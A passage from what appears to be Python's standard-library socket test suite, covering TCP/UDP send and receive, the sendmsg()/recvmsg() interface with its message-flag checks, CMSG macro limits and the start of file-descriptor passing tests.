self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification (the server socket
# becomes readable)
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
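# As a rough illustration (names here are hypothetical, not the concrete
# classes defined elsewhere in this module), a runnable test class would be
# assembled along these lines:
#
#   class SendmsgUDPExample(SendmsgConnectionlessTests, SomeUDPTestBase):
#       pass
#
# where SomeUDPTestBase combines SendrecvmsgConnectionlessBase with a
# SocketTestBase subclass that creates UDP sockets and fills in
# cli_sock/serv_sock and cli_addr/serv_addr.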
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
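# For example, on a connectionless subclass where
# sendmsg_to_server_defaults is ([], [], 0, self.serv_addr),
# sendmsgToServer([MSG]) ends up calling
# self.cli_sock.sendmsg([MSG], [], 0, self.serv_addr).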
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
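# Worked example: for a datagram subclass where
# msg_flags_non_eor_indicator includes MSG_TRUNC, checkFlags(flags,
# eor=False) requires MSG_TRUNC to be set in "flags", in addition to the
# common set/unset requirements.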
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
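# recvmsg_into() returns (nbytes, ancdata, msg_flags, address); below this
# is converted to the (data, ancdata, msg_flags, address) shape returned by
# recvmsg(), so the same generic tests work for both methods.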
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
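# Roughly: CMSG_LEN(n) is the size of a cmsghdr header plus n bytes of data
# (no trailing padding), while CMSG_SPACE(n) additionally includes the
# alignment padding required before a following control message.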
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
